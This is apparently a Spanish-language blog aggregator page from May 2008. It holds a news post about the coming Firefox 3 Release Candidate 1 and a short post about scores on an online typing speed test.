Vamos!! sin hacer trampas! jejeje, en realidad entre más practiques más rapido te haces! y no se, pero creo que soy más veloz usando el enter que la barra espaciadora! que cosas no?.

Óscar Tavares: Firefox 3 RC1 Finales de Mayo.

GnDx — mié, 14 may 2008 02:39:48 +0000

Una muy Buena Noticia me topo el día de hoy, Firefox 3 Rc1 para finales de este mes.

Mozilla anunció que ha terminado de hacer cambios en el primer Release Candidate (RC) de Firefox 3.0 y que está ahora trabajando en preparar esa versión para su lanzamiento a finales de este mes de Mayo. “Ya tenemos todo el código de Firefox 3.0 Release Candidate 1″, dijo Mike Schroepfer, vice-presidente de ingeniería de Mozilla en un mensaje en el blog de desarrolladores del proyecto.

Cuando Firefox 3.0 RC1 esté listo será distribuído a más de 1,2 Millones de actuales usuarios, iniciando una etapa de pruebas más extensivo que el sus anteriores versiones Beta. Schroepfer dijo también que si se encuentran errores serios continuarán lanzando “Release Candidates” hasta que la versión definitiva esté completada.

Cuando Firefox 2.0 fué lanzado en el 2006, necesitó de 3 RCs y por lo menos hasta Marzo pasado, Schroepfer esperaba que ocurriera lo mismo con Firefox 3.0.

Via: Vivalinux

José Antonio Martínez torres: ¿Qué tan rápido eres?

Antonio Martínez — mar, 13 may 2008 19:15:09 +0000

Una buena página que te pone varias palabras para teclear en 1 min.

56 words

Speedtest

Record superado:
61 words

Speed test